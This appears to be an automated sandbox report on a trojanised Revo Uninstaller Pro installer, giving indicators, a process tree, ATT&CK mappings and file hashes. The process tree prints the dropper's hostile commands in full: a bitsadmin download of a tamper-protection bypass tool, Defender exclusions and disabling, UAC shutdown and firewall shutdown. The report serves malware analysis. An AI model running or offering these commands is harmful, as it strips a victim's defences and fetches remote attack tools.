\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{37B86290-9C1A-453F-BFA7-CB6EC9CEC00F}\5.1\ = "LicProtector Library" ruplp.exe Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\.ruel Revo Uninstaller Pro 4.2.3.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ruel\ = "RevoUninstallerPro.ruel" Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\RevoUninstallerPro.ruel\DefaultIcon Revo Uninstaller Pro 4.2.3.tmp Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\RevoUninstallerPro.ruel Revo Uninstaller Pro 4.2.3.tmp -
Suspicious behavior: EnumeratesProcesses 56 IoCs
pid Process 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 4992 Revo Uninstaller Pro 4.2.3.tmp 4992 Revo Uninstaller Pro 4.2.3.tmp 2024 powershell.exe 2024 powershell.exe 828 powershell.exe 828 powershell.exe 828 powershell.exe 2236 powershell.exe 2236 powershell.exe 2236 powershell.exe 2228 powershell.exe 2228 powershell.exe 2228 powershell.exe 2380 powershell.exe 2380 powershell.exe 2380 powershell.exe 2164 powershell.exe 2164 powershell.exe 2164 powershell.exe 2448 powershell.exe 2448 powershell.exe 2448 powershell.exe 3584 powershell.exe 3584 powershell.exe 3584 powershell.exe 700 powershell.exe 700 powershell.exe 700 powershell.exe 4404 powershell.exe 4404 powershell.exe 4404 powershell.exe 4992 Revo Uninstaller Pro 4.2.3.tmp 4992 Revo Uninstaller Pro 4.2.3.tmp 2804 powershell.exe 2804 powershell.exe 2804 powershell.exe 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 936 powershell.exe 936 powershell.exe 936 powershell.exe 1328 powershell.exe 1328 powershell.exe 1328 powershell.exe 1232 powershell.exe 1232 powershell.exe 1232 powershell.exe 2000 powershell.exe 2000 powershell.exe 2000 powershell.exe 3544 powershell.exe 3544 powershell.exe 3544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 29 IoCs
description pid Process Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 828 powershell.exe Token: SeDebugPrivilege 2236 powershell.exe Token: SeDebugPrivilege 2228 powershell.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 2448 powershell.exe Token: SeDebugPrivilege 3584 powershell.exe Token: SeDebugPrivilege 700 powershell.exe Token: SeDebugPrivilege 4404 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 1232 powershell.exe Token: SeDebugPrivilege 2000 powershell.exe Token: SeDebugPrivilege 3544 powershell.exe Token: SeRestorePrivilege 1472 7z.exe Token: 35 1472 7z.exe Token: SeSecurityPrivilege 1472 7z.exe Token: SeSecurityPrivilege 1472 7z.exe Token: SeRestorePrivilege 2692 7z.exe Token: 35 2692 7z.exe Token: SeSecurityPrivilege 2692 7z.exe Token: SeSecurityPrivilege 2692 7z.exe Token: SeRestorePrivilege 1232 7z.exe Token: 35 1232 7z.exe Token: SeSecurityPrivilege 1232 7z.exe Token: SeSecurityPrivilege 1232 7z.exe -
Suspicious use of FindShellTrayWindow 22 IoCs
pid Process 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 4992 Revo Uninstaller Pro 4.2.3.tmp 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe -
Suspicious use of SendNotifyMessage 20 IoCs
pid Process 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 676 RevoUninPro.exe 676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe 1676 RevoUninPro.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 676 wrote to memory of 2392 676 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 84 PID 676 wrote to memory of 2392 676 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 84 PID 676 wrote to memory of 2392 676 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe 84 PID 2392 wrote to memory of 3048 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 88 PID 2392 wrote to memory of 3048 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 88 PID 2392 wrote to memory of 3048 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 88 PID 2392 wrote to memory of 3000 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 89 PID 2392 wrote to memory of 3000 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 89 PID 2392 wrote to memory of 3000 2392 7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp 89 PID 3048 wrote to memory of 3928 3048 WScript.exe 90 PID 3048 wrote to memory of 3928 3048 WScript.exe 90 PID 3048 wrote to memory of 3928 3048 WScript.exe 90 PID 3000 wrote to memory of 4992 3000 Revo Uninstaller Pro 4.2.3.exe 91 PID 3000 wrote to memory of 4992 3000 Revo Uninstaller Pro 4.2.3.exe 91 PID 3000 wrote to memory of 4992 3000 Revo Uninstaller Pro 4.2.3.exe 91 PID 3928 wrote to memory of 1808 3928 cmd.exe 93 PID 3928 wrote to memory of 1808 3928 cmd.exe 93 PID 3928 wrote to memory of 1808 3928 cmd.exe 93 PID 3928 wrote to memory of 2788 3928 cmd.exe 94 PID 3928 wrote to memory of 2788 3928 cmd.exe 94 PID 3928 wrote to memory of 2788 3928 cmd.exe 94 PID 3928 wrote to memory of 2024 3928 cmd.exe 103 PID 3928 wrote to memory of 2024 3928 cmd.exe 103 PID 3928 wrote to memory of 2024 3928 cmd.exe 103 PID 3928 wrote to memory of 828 3928 cmd.exe 106 PID 3928 wrote to memory of 828 3928 cmd.exe 106 PID 3928 wrote to memory of 828 3928 cmd.exe 106 PID 3928 wrote to memory of 2236 3928 cmd.exe 111 PID 3928 wrote to memory of 2236 3928 cmd.exe 111 PID 3928 wrote to memory of 2236 3928 cmd.exe 111 PID 3928 wrote to memory of 2228 3928 cmd.exe 112 PID 3928 wrote to memory of 2228 3928 cmd.exe 112 PID 3928 wrote to memory of 2228 3928 cmd.exe 112 PID 3928 wrote to memory of 2380 3928 cmd.exe 113 PID 3928 wrote to memory of 2380 3928 cmd.exe 113 PID 3928 wrote to memory of 2380 3928 cmd.exe 113 PID 3928 wrote to memory of 2164 3928 cmd.exe 114 PID 3928 wrote to memory of 2164 3928 cmd.exe 114 PID 3928 wrote to memory of 2164 3928 cmd.exe 114 PID 3928 wrote to memory of 2448 3928 cmd.exe 115 PID 3928 wrote to memory of 2448 3928 cmd.exe 115 PID 3928 wrote to memory of 2448 3928 cmd.exe 115 PID 3928 wrote to memory of 3584 3928 cmd.exe 116 PID 3928 wrote to memory of 3584 3928 cmd.exe 116 PID 3928 wrote to memory of 3584 3928 cmd.exe 116 PID 3928 wrote to memory of 700 3928 cmd.exe 117 PID 3928 wrote to memory of 700 3928 cmd.exe 117 PID 3928 wrote to memory of 700 3928 cmd.exe 117 PID 3928 wrote to memory of 4404 3928 cmd.exe 118 PID 3928 wrote to memory of 4404 3928 cmd.exe 118 PID 3928 wrote to memory of 4404 3928 cmd.exe 118 PID 3928 wrote to memory of 2804 3928 cmd.exe 119 PID 3928 wrote to memory of 2804 3928 cmd.exe 119 PID 3928 wrote to memory of 2804 3928 cmd.exe 119 PID 4992 wrote to memory of 716 4992 Revo Uninstaller Pro 4.2.3.tmp 120 PID 4992 wrote to memory of 716 4992 Revo Uninstaller Pro 4.2.3.tmp 120 PID 3928 wrote to memory of 1692 3928 cmd.exe 122 PID 3928 wrote to memory of 1692 3928 cmd.exe 122 PID 3928 wrote to memory of 1692 3928 cmd.exe 122 PID 716 wrote to memory of 2812 716 rundll32.exe 123 PID 716 wrote to memory of 2812 716 rundll32.exe 123 PID 2812 wrote to memory of 4120 2812 runonce.exe 125 PID 2812 wrote to memory of 4120 2812 runonce.exe 125 PID 4992 wrote to memory of 3912 4992 Revo Uninstaller Pro 4.2.3.tmp 127
Processes
-
C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Users\Admin\AppData\Local\Temp\is-8GH93.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp"C:\Users\Admin\AppData\Local\Temp\is-8GH93.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp" /SL5="$502C0,18678062,848384,C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\RPKxchvc43an\5jayrzw1q.vbs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\RPKxchvc43an\avNIprUwIk.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f5⤵
- System Location Discovery: System Language Discovery
PID:1808
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe5⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2788
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3544 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\RPKxchvc43an\main.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:1692 -
C:\Windows\SysWOW64\mode.commode 65,105⤵
- System Location Discovery: System Language Discovery
PID:3956
-
-
C:\ProgramData\RPKxchvc43an\7z.exe7z.exe e file.zip -p___________24467pwd13287pwd30257___________ -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1472
-
-
C:\ProgramData\RPKxchvc43an\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\ProgramData\RPKxchvc43an\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"afcdpsrv.exe"""5⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3980 -
C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2376
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\RPKxchvc43an\delXPDUR9c.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:5036 -
C:\Windows\SysWOW64\timeout.exetimeout /T 180 /NOBREAK5⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3232
-
-
-
-
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Users\Admin\AppData\Local\Temp\is-IOEEL.tmp\Revo Uninstaller Pro 4.2.3.tmp"C:\Users\Admin\AppData\Local\Temp\is-IOEEL.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$301C4,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\system32\rundll32.exe"rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf5⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:716 -
C:\Windows\system32\runonce.exe"C:\Windows\system32\runonce.exe" -r6⤵
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\System32\grpconv.exe"C:\Windows\System32\grpconv.exe" -o7⤵PID:4120
-
-
-
-
C:\Windows\system32\regsvr32.exe"regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s5⤵
- Loads dropped DLL
- Modifies system executable filetype association
- Modifies registry class
PID:3912
-
-
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:956
-
-
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:676
-
-
C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1676
-
-
-
-
-
C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exeC:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1360
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
3Change Default File Association
1Component Object Model Hijacking
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
3Change Default File Association
1Component Object Model Hijacking
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1BITS Jobs
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
3Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
39KB
MD5498c3d4d44382a96812a0e0ff28d575b
SHA1c34586b789ca5fe4336ab23ad6ff6eeb991c9612
SHA25623cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba
SHA512ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1
-
Filesize
14.2MB
MD5dc21d689cfa1860e8820ed0ee45b1f2a
SHA1acf2db6df76114601a2e58097629e0c8cbce129b
SHA25601732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c
SHA512a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140
-
Filesize
188KB
MD575d7bf3468669a6c3df6f4d048315128
SHA1678d3b531738573520367b47c0cd52cf5e431fa0
SHA256927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae
SHA5129c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e
-
Filesize
23.7MB
MD5ddb041550a3e69764cd9d7d3de3636f3
SHA11ad9b13a6627c1e6f258951965e39ba9cfd9cb1c
SHA25654e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975
SHA51200498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800
-
Filesize
111KB
MD5c37fb8c46d0281dd27768fd1101614f0
SHA103e736a49687f9ac10b35cc791e7df5b7e55f4d8
SHA256ee2e68e61821054a1946efd0260f7e70c3f338765d04edca7625d05677fd980c
SHA512b074f71e06c38f484573edde490f85792ada589e953e96d64188461f41e8ca4d0a90a6fc081ec36e4dc0067337abeea567c40b4e4fd89522497b1ba735262776
-
Filesize
114KB
MD56c9dbe894ea20eb190db6b483f17030d
SHA11bac02001cba8c083b987264f1bb89b05b74155f
SHA25624ffc231de9a4573b4ae743555c43dcc550ff8455ea681c788e50bda03a3a846
SHA512b0941e0026ba9117d3cf846e89723dede9f9a00dde688dbf90715244cfdc38b75b579e1c02c788626b16cb6875934341fd2acb685c145389ccd629df9355f62a
-
Filesize
2KB
MD5edc78deb34de240c787b1011161e9a4e
SHA12d31275530dce33d3bc329991c8ad59e1b303577
SHA25669569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b
SHA512e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b
-
Filesize
9.6MB
MD51dd8459f2595e4c0603ad491590f6952
SHA1607efe3c74388fb1e4b19f8f7ed2520ebfc349a1
SHA2565bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d
SHA512c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d
-
Filesize
96KB
MD5c84933bcccf41369ef9ecce015b86ed0
SHA1624713276ae217d8d05c03598eecd31209c7f77a
SHA256ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679
SHA512221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363
-
Filesize
1.6MB
MD572491c7b87a7c2dd350b727444f13bb4
SHA11e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA25634ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
22KB
MD5b0a7842dd51df8942bc8b837282d1c2b
SHA10e9432597657c28ca9ac766ac7bf0a903d6aeb3b
SHA2564a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8
SHA512b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6
-
Filesize
111B
MD5308ba58a50ffa9eabd31fdba79af6dd1
SHA129c09164facb6419f9d7f9e103f7e13bed4743a1
SHA2560ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243
SHA512674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f
-
Filesize
2.0MB
MD53b2c8537303cfbb12e1af76947dcb64b
SHA1811cc2d3d93135896cbc0dc9bd9a0009f7b8cfd0
SHA256a323f08261c4f89287f6bded51bf6b0df4f677274175885f507377191aa4a397
SHA5120201bb2c2ab36a97f770169104a460c9ba388228c45db39cd91e11eebad8ea410b64af58f2e972fd20fad046ebebba3642b03c3d1e3b5639d4c9d2cb45988610
-
Filesize
826KB
MD5491e4955c0b28be327ac8fb7fd90318c
SHA108e6d67458bd6922814e6b3327a6f557672d6e10
SHA256d0a1a02c3caaba32b9853c28b948e2340c6a46a1dee83752bd9dff06e487b471
SHA5125921316d73872e2c09f838581a186bbaebea2a81637f051ec6c6ad4a80fe9367feff0ac6faa766152184161efb030f322a3d7f8a483fddccde6143cbe19f673a
-
Filesize
631KB
MD5f82ced6150c8622b3a9aad8d5fa37638
SHA1592ef68d1586ea289f7422837ac207640a21bfc7
SHA256eaa515d33e4290782f2acf2c6c68147f1a70e85dfbfdf2537344b83a9cc6e424
SHA512f4f961606c505b8ee0ba1ec0b76f300825ba543c07590bf01a9114722bddab22b9fd671f12378874c2737ae8824c3bb10febf8ffab855c2c1b6887674eac7608
-
Filesize
2.1MB
MD53d5e062057576606e0ef486c643cfa0d
SHA119b93a4d1ba59e9c9a26c77fef6e9671b10ae51d
SHA256abd1d8b19c76ce4f1430498c4cea43f79c0bb7abd624943453450a333ec68077
SHA512a3aa37138855a0e4229c6ac04f7ccf80ae6a0ddcee7b694d2ca4c2b385135c62bdd206ee86239f4195b51b146a2bb3921021630f12be1f8da2ad7f284f1867c6
-
Filesize
